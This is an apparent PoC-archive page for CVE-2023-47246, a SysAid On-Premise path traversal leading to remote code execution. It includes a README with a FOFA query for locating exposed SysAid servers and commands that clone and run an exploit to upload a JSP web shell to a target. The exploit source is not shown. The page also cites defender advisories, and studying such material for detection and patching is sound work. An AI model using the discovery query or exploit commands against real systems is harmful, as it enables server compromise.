Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-47246 PoC — Sysaid Technologies SysAid 安全漏洞

Source
Associated Vulnerability
Title:Sysaid Technologies SysAid 安全漏洞 (CVE-2023-47246)
Description:Sysaid Technologies SysAid是以色列Sysaid Technologies公司的一套IT服务管理解决方案。SysAid On-Premise是SysAid的本地安装版。 Sysaid Technologies SysAid On-Premise 23.3.36之前版本存在安全漏洞,该漏洞源于存在路径遍历漏洞。攻击者可利用的该漏洞将文件写入Tomcat webroot后执行代码。
Description
exploit for cve-2023-47246 SysAid RCE (shell upload)
Readme
# Vulnerability Details

1. fofa:

   ```text
   body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
   ```

2. Affected versions: SysAid Server<23.3.36

# Vulnerability Recurrence

1. Execute the script:

   ```shell
   git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
   cd CVE-2023-47246-EXP
   pip install -r requirements.txt
   python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp
   ```

2. result:![](https://github.com/W01fh4cker/CVE-2023-47246-EXP/assets/101872898/690d6a3c-b5ce-45bb-b37a-7d5ca72b13ab)

# Reference

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml  
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246  
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification  
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability

File Snapshot

[4.0K] /data/pocs/a108e1369e3bf04f07e696ce656652bc2570af73 ├── [ 12K] CVE-2023-47246-EXP.py ├── [ 4] CVE-2023-47246.txt ├── [1.0K] README.md └── [ 16] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.